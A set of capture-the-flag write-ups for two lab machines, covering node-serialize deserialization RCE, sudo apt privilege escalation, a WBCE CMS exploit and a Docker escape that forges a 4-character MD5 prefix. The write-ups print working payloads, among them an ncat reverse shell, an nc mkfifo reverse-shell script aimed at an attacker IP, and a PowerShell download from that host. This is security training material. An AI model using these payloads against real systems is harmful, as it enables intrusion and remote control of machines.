--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 9.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/README.md:
--------------------------------------------------------------------------------
1 | # Serial Escape
2 |
3 | Exploit vulnerabilities in the web application, gain access to the underlying machine, and escalate your privileges to become the root user.
4 |
5 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/Writeup.md:
--------------------------------------------------------------------------------
1 | # Serial Escape
2 |
3 | You can begin by running a basic NMAP scan on the target.
4 |
5 | ```bash
6 | nmap -sV -v
7 | ```
8 |
9 | 
10 |
11 | Based on the NMAP result, there are two open ports: SSH (22) and HTTP (80).
12 | If you navigate to the target IP address on a browser you will see a page as follows.
13 |
14 | 
15 |
16 | Based on the error message, you can understand that the base URL "/" requires authentication to visit.
17 |
18 | To discover directories on the web application, you can use a directory brute-forcing tool like FFUF. This revealed an additional directory named 'dev', which also requires authentication.
19 |
20 | 
21 |
22 | When you navigate to the registration page to create a new user, you will see that the form requires you to enter an email address ending with "@oracle.az" only.
23 |
24 | 
25 |
26 | Upon registering, the application sends an OTP code to the provided email for verification, ensuring that users cannot create accounts with fake email addresses. However, after further inspection, you can notice that the email validation (checking if it ends with '@oracle.az') is only performed on the client side.
27 |
28 | 
29 |
30 | You can complete the registration form with dummy data, capture the network traffic using Burp Suite, and modify the email field to use an address of your choice — either a personal email or a temporary/disposable one to receive the OTP and complete verification. For demonstration purposes, a temporary email was used.
31 |
32 | https://temp-mail.org/
33 |
34 | 
35 |
36 | Once you have placed a valid email address you can forward the traffic, which will send an OTP to the provided address.
37 |
38 | 
39 |
40 | To complete the registration process, enter the OTP code and submit.
41 |
42 | 
43 | 
44 |
45 | As a result, you will be redirected to the login page with a success message indicating that you have successfully created a new user.
46 | Having a user on the web application you can now log in. On the home page, you will see the first flag for the CTF.
47 |
48 | 
49 |
50 | Since you now have a valid user, you can visit the "dev" directory discovered earlier while directory brute-forcing with FFUF.
51 | On the "dev" directory you will see two files: notes.txt and source.zip
52 |
53 | 
54 |
55 | The notes.txt file contains a message titled 'Security Alert,' highlighting a critical vulnerability in the application originating from a package called ```node-serialize```.
56 | According to this message, you can understand that your next step will be downloading the source code of the web app (```/dev/source.zip```) and analyzing it to move the attack further.
57 |
58 | 
59 |
60 | To begin your code review, start with the ```app.js``` file. In the ```app.js``` file, you'll again notice a warning comment regarding the ```node-serialize``` package.
61 |
62 | 
63 |
64 | To identify what the node-serialize package is vulnerable to, you can search online. You'll discover that it has a critical vulnerability: arbitrary remote code execution, which is explained in the following link. This vulnerability specifically affects the ```unserialize``` function, according to the explanation.
65 | https://security.snyk.io/vuln/npm:node-serialize:20170208
66 |
67 | Knowing that the web application is vulnerable to remote code execution, you can examine the source code further to find out where and how the ```node-serialize``` package is used. By searching in the ```app.js``` file, you'll find that the vulnerable package is passed to the ```home``` router after being imported.
68 |
69 | 
70 |
71 | To understand how and for what functionality of the web application the ```node-serialize``` package is used, open the JavaScript file responsible for the home page.
72 | Upon reviewing the code, two key points emerge:
73 | * When a user searches for a keyword, it is taken from the request, serialized, and stored in a cookie named ```last_search```.
74 | * During each GET request to the home page, the value of the ```last_search``` cookie is retrieved, **_UNSERIALIZED_** (which is the vulnerable part), and passed to the client side to be displayed.
75 |
76 | This functionality allows users to see their most recent search by storing its value in a cookie.
77 |
78 | 
79 |
80 | In the image below, you can see an example usage of this functionality.
81 |
82 | 
83 |
84 | As your next step, you have to craft such a payload that will execute system commands on the target website.
85 | You can find an example payload from the link provided earlier.
86 |
87 | ```javascript
88 | {"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}
89 | ```
90 |
91 | To adjust the payload for our target application, we need to strip away the dictionary structure, the enclosing double quotes and the escape characters, leaving only the core payload.
92 |
93 | To test if the payload works, we can attempt to ping our attacking machine and verify whether the injected system command is executed. To detect the ping requests, start a ```tcpdump``` on the attacker machine to monitor ICMP traffic.
94 |
95 | ```javascript
96 | _$$ND_FUNC$$_function (){require('child_process').exec('ping -c 3', function(error, stdout, stderr) { console.log(stdout) });}()
97 | ```
98 |
99 | Keep in mind that for successful code execution, the payload must first be sent to the web application. After that, you need to send another search keyword. This way, the payload becomes your previous search query and gets unserialized when accessing the home page. The vulnerability, as mentioned earlier, lies in the unserialize function of the package, not the serialize function.
100 |
101 | Once the payload above is injected, you will observe six ICMP packets: three requests and three replies.
102 |
103 | 
104 |
105 | Confirming that the payload works, you can modify the payload to get a reverse shell.
106 |
107 | ```javascript
108 | _$$ND_FUNC$$_function (){require('child_process').exec('ncat -e /bin/bash', function(error, stdout, stderr) { console.log(stdout) });}()
109 | ```
110 |
111 | Upon injection of the payload above, you will get a reverse shell under the "www-data" user, which will enable you to grab the second flag for the CTF.
112 |
113 | 
114 | 
115 |
116 | Moving on, you can start looking for a vulnerability or misconfiguration that leads to privilege escalation.
117 | Running ```sudo -l``` shows that the www-data user is allowed to run the following command with ```sudo``` privileges.
118 |
119 | ```
120 | /usr/bin/apt edit-sources ../*
121 | ```
122 | 
123 |
124 | Executing the command ```sudo /usr/bin/apt edit-sources ../foo``` will present you with multiple options to choose a text editor. For privilege escalation, you can select either ```nano``` or ```vim```. Since the chosen editor runs with sudo privileges, it can be used to escalate; the technique for each editor is documented in the following links:
125 |
126 | https://gtfobins.github.io/gtfobins/vim/#sudo
127 |
128 | https://gtfobins.github.io/gtfobins/nano/#sudo
129 |
130 | 
131 |
132 | As a result, you will gain elevated privileges on the target machine as the root user and will be able to read the last flag for the CTF.
133 |
134 | 
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h29_25.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h29_25.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h30_17.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h30_17.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h30_48.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h30_48.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h31_16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h31_16.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h36_49.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h36_49.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h38_46.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h38_46.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_16.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_31.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_31.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_50.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_50.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h41_34.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h41_34.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h41_42.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h41_42.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h45_54.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h45_54.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h54_27.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h54_27.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h12_04.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h12_04.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h22_19.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h22_19.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h24_52.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h24_52.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h30_58.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h30_58.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h33_34.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h33_34.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h34_12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h34_12.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h35_11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h35_11.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h56_23.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h56_23.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-27_22h13_01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-27_22h13_01.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/README.md:
--------------------------------------------------------------------------------
1 | Exploit the vulnerabilities and gain root access to the machine.
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/Writeup.md:
--------------------------------------------------------------------------------
1 | # INFO
2 |
3 | This CTF was designed by Elnur Badalov and was Challenge №12 in ICSD's CTF event "Who am I" held on `20.09.2024`.
4 |
5 | This write-up will show the solution to this CTF challenge.
6 |
7 | # Reconnaissance
8 | ## NMAP Scan
9 | ```bash
10 | nmap -p- -sS -sC -sV 10.0.10.25 -v --min-rate 10000
11 | # result
12 | PORT STATE SERVICE VERSION
13 | 21/tcp open ftp vsftpd 2.3.4
14 | | ftp-syst:
15 | | STAT:
16 | | FTP server status:
17 | | Connected to 10.255.1.18
18 | | Logged in as ftp
19 | | TYPE: ASCII
20 | | No session bandwidth limit
21 | | Session timeout in seconds is 300
22 | | Control connection is plain text
23 | | Data connections will be plain text
24 | | At session startup, client count was 3
25 | | vsFTPd 2.3.4 - secure, fast, stable
26 | |_End of status
27 | | ftp-anon: Anonymous FTP login allowed (FTP code 230)
28 | |_Cant get directory listing: PASV IP 172.17.0.2 is not the same as 10.0.10.25
29 | 22/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.7 (Ubuntu Linux; protocol 2.0)
30 | | ssh-hostkey:
31 | | 256 43:eb:24:ea:01:e5:d2:e0:55:4d:37:95:3c:ac:6a:6e (ECDSA)
32 | |_ 256 97:33:4e:15:41:32:8c:32:86:6c:c3:b6:5c:be:fa:d9 (ED25519)
33 | 80/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
34 | |_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
35 | | http-title: CMC - A test post to test CMS
36 | |_Requested resource was http://10.0.10.25/wbce/
37 | |_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
38 | |_http-generator: WBCE CMS; https://wbce.org
39 | | http-methods:
40 | |_ Supported Methods: GET HEAD POST OPTIONS
41 | 3389/tcp open ms-wbt-server Microsoft Terminal Services
42 | | ssl-cert: Subject: commonName=WINDOCL-GI0DS47
43 | | Issuer: commonName=WINDOCL-GI0DS47
44 | | Public Key type: rsa
45 | | Public Key bits: 2048
46 | | Signature Algorithm: sha256WithRSAEncryption
47 | | Not valid before: 2024-09-11T00:50:52
48 | | Not valid after: 2025-03-13T00:50:52
49 | | MD5: 8043:0cbe:6a96:c2d8:61fb:7dea:c545:61df
50 | |_SHA-1: 2771:80d5:854a:3296:0f47:7072:934c:86d1:a095:44fd
51 | |_ssl-date: 2024-09-23T06:33:02+00:00; 0s from scanner time.
52 | | rdp-ntlm-info:
53 | | Target_Name: WINDOCL-GI0DS47
54 | | NetBIOS_Domain_Name: WINDOCL-GI0DS47
55 | | NetBIOS_Computer_Name: WINDOCL-GI0DS47
56 | | DNS_Domain_Name: WINDOCL-GI0DS47
57 | | DNS_Computer_Name: WINDOCL-GI0DS47
58 | | Product_Version: 10.0.20348
59 | |_ System_Time: 2024-09-23T06:33:01+00:00
60 | ```
61 | Four ports are open:
62 | - 21 - `vsftpd 2.3.4`. A public exploit exists for it that gives RCE.
63 | - 22 - SSH.
64 | - 80 - a web app (a CMS).
65 | - 3389 - RDP, which suggests the target is a Windows machine.
66 | ## FTP Reveals a Hidden File
67 |
68 | FTP allows anonymous login, and we find a hidden file `.note.txt`. We can download it using the `get` command.
69 | 
70 | It has the following note:\
71 | ```
72 | You could ask me to give you a virtual machine in the Cloud. Why are you doing such weird thing, Mr. Windoclin? Who setups Windows Server that way?
73 |
74 | Additionally, add me to the Github Repository as a Contributor.
75 | ```
76 | Here, we learn that the user's name is `Windoclin` and he did something extraordinary with Windows. Additionally, he may have a GitHub account.
77 |
78 | ### Rabbit Hole
79 |
80 | Although the FTP service seems exploitable (vsftpd 2.3.4 has a public exploit for backdoor command execution via CVE-2011-2523), it is a **rabbit hole** and won’t be useful.
81 | ## Github OSINT
82 | Searching for `windoclin` on GitHub reveals a repository that points to his profile.
83 | 
84 | We discover another repo called *autotask*:
85 | - https://github.com/windoclin/autotask
86 | 
87 | It contains automation scripts that leak credentials:
88 | 
89 | ```python
90 | ...
91 | username = "supascrtadminus3r"
92 | password = "supascrtp4ssw0rd!!"
93 | ...
94 | ```
95 | # CMS
96 | ## Recon
97 | When we send a GET request to the IP, it redirects to `http://10.0.10.25/wbce/`.
98 | If we request the new URL again (or open it in a browser), we see that it loads resources from `http://windoclin/wbce`. This indicates that we need to add the `windoclin` hostname to `/etc/hosts`.
99 | The `wbce` path segment suggests that the CMS in use is WBCE.
100 | This CMS does exist, and several public exploits are available for it.
101 | 
102 | ## CMS Admin Access
103 | By checking some common directory names, we can find the **admin portal** of the CMS, where we can log in using the credentials found earlier.  From the admin dashboard, we find the following information: `WBCE Version: 1.6.2`.
104 | ## RCE
105 | We use the following exploit:
106 | - https://github.com/capture0x/WBCE_CMS/
107 |
108 | To get RCE, navigate to **Add-ons**, then **Languages**, and **install a language**.
109 | 
110 | Let’s try a simple payload:
111 | ```php
112 |
113 | ```
114 | Write this to a PHP file, upload it, and click **Install**.
115 | 
116 | The exploit succeeded! We got `nt authority\system`, which grants the highest privilege on the system.
117 | ### Reverse Shell
118 | For a reverse shell, I used this exploit:
119 | - https://github.com/ivan-sincek/php-reverse-shell
120 | Modify port and IP and repeat the steps:
121 | 
122 | # Windows Enumeration
123 | Let's check the Desktop of the **windoclin** user:
124 | 
125 | We find a shortcut to a folder located in a network share: `\\host.lan`.
126 | ```powershell
127 | net view \\host.lan
128 | # gives
129 | ...
130 | Data Disk Shared
131 | ...
132 |
133 | # next, mount the share
134 | net use Z: \\host.lan\Data
135 |
136 | # cd there
137 | Z:
138 | Z:\>dir
139 | Volume in drive Z is Data
140 | Volume Serial Number is AC24-E051
141 |
142 | Directory of Z:\
143 |
144 | 09/12/2024 09:19 AM .
145 | 09/12/2024 09:19 AM ..
146 | 09/12/2024 02:36 AM 21,846,505 1.6.2.zip
147 | 09/12/2024 09:12 AM 2,468 healthy.sh
148 | 09/12/2024 10:25 AM 665 prevention.sh
149 | 09/12/2024 09:19 AM 166 README.MD
150 | 09/11/2024 10:19 AM 7 user.txt
151 | 01/30/2024 11:47 PM WBCE_CMS-1.6.2
152 | ```
153 | Congratulations! We found `user.txt`!
154 | 
155 | # Windows Docker Escape
156 | Three files interest us:
157 | - `README.MD`
158 |   - It contains `6238383731656632663334623638393836333933353130373530653833323635`, which is the hex encoding of `b8871ef2f34b68986393510750e83265`.
159 | ````markdown
160 | # A Note from Mr. Windoclin
161 | ```
162 | 6238383731656632663334623638393836333933353130373530653833323635
163 | ```
164 |
165 | Do not modify the `healthy.sh`, otherwise it will not run**!**
166 | ````
167 | - `prevention.sh`
168 |   - A custom wrapper script intended to stop another script from running if that script has been overwritten.
169 | ```bash
170 | #!/bin/bash
171 |
172 | if [ "$#" -ne 2 ]; then
173 |     echo "Usage: $0 <script_to_run> <the_md5>"
174 |     exit 1
175 | fi
176 |
177 | script_to_run=$1
178 | the_md5=$2
179 |
180 | if [ ! -f "$script_to_run" ]; then
181 |     echo "Error: The script '$script_to_run' does not exist."
182 |     exit 1
183 | fi
184 |
185 | actual_md5_prefix=$(md5sum "$script_to_run" | awk '{print $1}' | cut -c 1-4)   # only the first 4 hex chars (16 bits) of the digest
186 | expected_md5_prefix=$(echo "$the_md5" | awk '{print $1}' | cut -c 1-4)
187 |
188 | if [ "$actual_md5_prefix" == "$expected_md5_prefix" ]; then
189 |     echo "MD5 checksum matches. Running the script..."
190 |     bash "$script_to_run"
191 | else
192 |     echo "MD5 checksum does not match. Expected '$expected_md5_prefix', but got '$actual_md5_prefix'."
193 |     exit 1
194 | fi
195 | ```
196 | - `healthy.sh`
197 |   - This script runs the regular health checks. Using the following command, we can get its MD5 checksum:
198 | ```powershell
199 | certutil -hashfile .\healthy.sh MD5
200 | # result
201 | MD5 hash of .\healthy.sh:
202 | b8871ef2f34b68986393510750e83265
203 | ```
204 |
205 | The MD5 hash `b8871ef2f34b68986393510750e83265` matches the one in the `README.MD` file.
206 |
207 | Overall, the mechanism implemented here performs regular health checks from a machine that connects to the shared folder. However, its protection against running an overwritten file is *insecure*: it compares only the first 4 hex characters of the MD5 hash, i.e. 16 bits, so on average about 65,536 candidate files are enough to find one whose hash prefix matches. This makes it vulnerable to a brute-force attack using the following script:
208 |
209 | `brute.sh`
210 | ```bash
211 | #!/bin/bash
212 |
213 | # prepare the payload
214 | FILE_PATH="shell.sh"
215 | echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.0.10.35 4444 >/tmp/f' > "$FILE_PATH"
216 |
217 | TARGET_CHECKSUM="b887"
218 |
219 | # append '#' to the end of the file (a bash comment, so the payload still runs)
220 | # until the first 4 hex characters of its MD5 match the target
221 | while true; do
222 |     CURRENT_CHECKSUM=$(md5sum "$FILE_PATH" | awk '{ print $1 }' | cut -c 1-4)
223 |
224 |     if [ "$CURRENT_CHECKSUM" == "$TARGET_CHECKSUM" ]; then
225 |         echo "The file's checksum now matches the target: $CURRENT_CHECKSUM"
226 |         break
227 |     fi
228 |
229 |     echo -n "#" >> "$FILE_PATH"
230 | done
231 | ```
232 | After creating `shell.sh`, transfer it onto the target machine, for example by serving it from a Python HTTP server.
233 | 
234 |
235 | Then, on the target machine, replace the file in `Z:\`:
236 | ```powershell
237 | Invoke-WebRequest -Uri http://10.0.10.35:8000/shell.sh -OutFile healthy.sh
238 | ```
239 |
240 | Set up a listener and wait for a connection.
241 |
242 | Finally, voilà! We successfully obtain a shell and retrieve `root.txt`!
243 | 
244 | # Conclusion
245 | By exploring further, we can find a `docker-compose.yml` file, which reveals that **Windows** is running as a **Docker container** on a **Linux** host. The shared folder we accessed earlier is mounted between the Linux host and the Docker container.
246 | 
247 | 
248 |
249 | This was a non-standard Docker escape: the host executed a script from a share that the container could write to, and the only thing guarding that script was a 4-character hash prefix comparison.
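The check in `prevention.sh` compares 16 bits of an MD5 digest. The following Python is an added example, not part of this writeup or of the challenge files: it decodes the hex string from `README.MD`, reimplements the prefix comparison, measures how many candidates a prefix collision takes on a constructed stand-in for `healthy.sh`, and shows a full-digest, constant-time comparison that the same trick does not pass. The sample script content and the numbered-comment variation (instead of `brute.sh`'s appended `#` bytes) are assumptions of the example.

```python
"""Added example, not part of the writeup or the challenge files: why a 4-character
MD5 prefix is not an integrity check, and what a proper comparison looks like."""
import hashlib
import hmac

# Hex string found in the challenge's README.MD; it decodes to the MD5 of healthy.sh.
README_HEX = "6238383731656632663334623638393836333933353130373530653833323635"

# Constructed stand-in for healthy.sh (assumption: the real script is not reproduced).
SAMPLE_SCRIPT = b"#!/bin/bash\necho 'constructed health check'\n"


def decode_readme_hash(hex_text: str) -> str:
    """README.MD stores the expected MD5 as hex-encoded ASCII; decode it."""
    return bytes.fromhex(hex_text).decode("ascii")


def weak_prefix_check(content: bytes, expected_md5: str, prefix_len: int = 4) -> bool:
    """Mirror of prevention.sh: only the first prefix_len hex characters are compared."""
    return hashlib.md5(content).hexdigest()[:prefix_len] == expected_md5[:prefix_len]


def expected_tries(prefix_len: int = 4) -> int:
    """Average number of random candidates needed to match a hex prefix (4 bits per char)."""
    return 16 ** prefix_len


def forge_prefix(base: bytes, expected_md5: str, max_attempts: int = 2_000_000):
    """Find a variant of `base` whose MD5 shares the 4-character prefix of expected_md5.

    brute.sh appends '#' bytes one at a time; here a numbered comment line is varied
    instead (an assumption of this example) so every candidate stays short. Either way
    the extra bytes are a bash comment, so the script's behaviour is unchanged.
    Returns (attempts, content), or (-1, None) if the bound is exhausted."""
    for attempt in range(max_attempts):
        candidate = base + b"# nonce=%d\n" % attempt
        if weak_prefix_check(candidate, expected_md5):
            return attempt, candidate
    return -1, None


def sha256_hex(content: bytes) -> str:
    """Full SHA-256 digest as hex; the reference value a proper check would store."""
    return hashlib.sha256(content).hexdigest()


def full_digest_check(content: bytes, expected_sha256_hex: str) -> bool:
    """Hardened replacement: compare the whole SHA-256 digest, in constant time."""
    return hmac.compare_digest(sha256_hex(content), expected_sha256_hex)


if __name__ == "__main__":
    expected = decode_readme_hash(README_HEX)
    attempts, forged = forge_prefix(SAMPLE_SCRIPT, expected)
    print(f"README hash: {expected}")
    print(f"prefix {expected[:4]} matched after {attempts} tries (average ~{expected_tries()})")
    print("prefix check accepts forged file:", weak_prefix_check(forged, expected))
    print("full check accepts forged file:  ", full_digest_check(forged, sha256_hex(SAMPLE_SCRIPT)))
```

Even the full-digest version only helps if the reference hash lives somewhere the writer of the share cannot reach; in this challenge `README.MD` sat in the same writable share as `healthy.sh`, so the reference value has to be stored outside the share (or the script has to be signed) for the check to mean anything.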
250 |
251 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-admin-dashboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-admin-dashboard.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-admin-panel.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-admin-panel.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-hostname-revealed.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-hostname-revealed.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-rce.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-rce.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-redirects.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-redirects.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-reverse-shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-reverse-shell.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/docker-compose-file.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/docker-compose-file.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/ftp-session.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/ftp-session.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint-2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint-3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/machine-exploited.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/machine-exploited.png
--------------------------------------------------------------------------------
